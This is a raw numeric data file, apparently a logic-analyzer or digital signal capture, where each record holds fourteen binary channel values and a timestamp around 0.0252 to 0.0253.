1,1,1,1,0,0,0,0,0,0,0,0,0,1,2.5195180e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,2.5195204e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,2.5195228e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,2.5195252e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5195256e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5195276e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5195300e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5195328e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5195352e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5195380e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.5195404e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5195428e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5195436e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5195452e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5195476e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5195484e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.5195528e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5195552e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5195560e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5195580e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5195604e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5195628e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5195652e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5195676e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5195700e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5195724e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5195748e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5195800e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5195824e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5195876e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5195900e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5195948e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5195972e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5196028e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5196052e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5196076e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5196100e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5196124e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5196148e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5196156e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.5196200e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5196224e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5196232e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5196252e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5196276e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5196324e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5196348e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5196400e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5196424e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5196476e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5196500e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5196524e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5196548e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5196572e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5196600e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5196652e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5196676e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5196680e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.5196724e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5196748e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5196756e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5196800e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5196824e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5196876e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5196900e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5196924e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5196948e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5196972e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5197000e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5197024e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5197052e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5197076e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5197100e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5197124e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5197148e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5197180e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5197200e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5197252e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5197276e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5197280e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.5197300e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5197324e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5197332e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5197348e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5197380e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5197400e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5197424e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5197476e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5197500e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5197524e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5197548e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5197600e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5197624e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5197676e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5197700e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5197752e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5197780e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5197804e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5197824e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5197852e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5197876e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5197900e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5197928e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5197952e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5197980e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5198004e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5198028e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5198052e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5198076e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5198100e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5198128e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5198152e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5198180e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5198204e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5198228e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5198252e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5198276e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5198284e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.5198300e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5198328e-02 1,1,1,1,0,1,0,0,0,0,0,0,0,0,2.5198332e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5198336e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5198352e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5198380e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.5198428e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5198452e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5198460e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5198476e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5198500e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5198528e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5198552e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5198580e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5198604e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5198628e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5198652e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5198700e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5198728e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5198780e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5198804e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5198852e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5198876e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5198928e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5198952e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5198980e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5199004e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5199028e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5199052e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5199100e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5199128e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5199132e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.5199180e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5199204e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5199212e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5199252e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5199276e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5199328e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5199352e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5199380e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5199404e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5199428e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5199452e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5199476e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5199500e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5199528e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5199552e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5199580e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5199604e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5199628e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5199652e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5199676e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5199700e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5199724e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5199752e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5199780e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5199800e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5199824e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5199852e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5199876e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5199900e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5199948e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5199972e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5200028e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5200052e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5200100e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5200124e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5200176e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5200200e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5200224e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5200252e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5200276e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5200300e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5200324e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5200348e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5200400e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5200424e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5200476e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5200500e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5200548e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5200572e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5200628e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5200652e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5200676e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5200700e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5200724e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5200748e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5200772e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5200800e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5200824e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5200852e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5200876e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5200900e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5200924e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5200948e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5200972e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201000e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201024e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201052e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201076e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201100e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201124e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201148e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201172e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201200e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201224e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201252e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201276e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201300e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201324e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201348e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201372e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201400e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201424e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201452e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201476e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201500e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201524e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201548e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201572e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201600e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201624e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201652e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201676e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201700e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201724e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201748e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201772e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201800e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201824e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201852e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201876e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201900e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201924e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5201948e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5201972e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5202000e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5202024e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5202052e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5202076e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5202100e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5202124e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5202148e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5202172e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5202200e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5202224e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5202252e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,2.5326324e-02 0,0,0,0,0,1,0,0,0,1,0,0,0,1,2.5326508e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,2.5326532e-02 0,0,0,0,1,1,0,0,0,1,0,1,0,1,2.5326552e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,2.5326576e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,1,2.5326876e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,2.5326900e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,2.5326908e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,2.5326924e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,2.5326948e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,2.5326972e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,2.5327000e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,2.5327024e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,2.5327052e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,2.5327076e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,2.5327100e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,2.5327124e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,2.5327148e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5327156e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5327176e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5327200e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5327228e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5327252e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5327276e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5327300e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5327324e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5327348e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5327356e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5327400e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5327428e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5327432e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5327452e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5327476e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5327500e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5327524e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5327548e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5327576e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5327628e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5327652e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5327656e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5327676e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5327700e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5327724e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5327748e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5327772e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5327800e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5327828e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5327852e-02 0,0,0,0,1,1,0,0,0,0,0,0,0,0,2.5327856e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5327860e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5327900e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5327924e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5327948e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5327976e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5327980e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5328028e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5328052e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5328060e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5328100e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5328124e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5328132e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5328148e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5328176e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5328200e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5328228e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5328252e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5328276e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5328284e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5328324e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5328348e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5328376e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5328400e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5328404e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5328428e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5328452e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5328500e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5328524e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5328548e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5328576e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5328600e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5328628e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5328632e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5328652e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5328676e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5328700e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5328724e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5328748e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5328776e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5328800e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5328824e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5328852e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5328876e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5328924e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5328948e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5328956e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5329000e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5329028e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5329032e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5329076e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5329100e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5329124e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5329148e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5329172e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5329200e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5329204e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5329252e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5329276e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5329284e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5329324e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5329348e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5329356e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5329376e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5329400e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5329424e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5329452e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5329476e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5329500e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5329508e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5329548e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5329576e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5329600e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5329628e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5329652e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5329676e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5329700e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5329724e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5329748e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5329776e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5329800e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5329828e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5329852e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5329876e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5329900e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5329924e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5329948e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5329980e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5330000e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5330028e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5330052e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5330076e-02 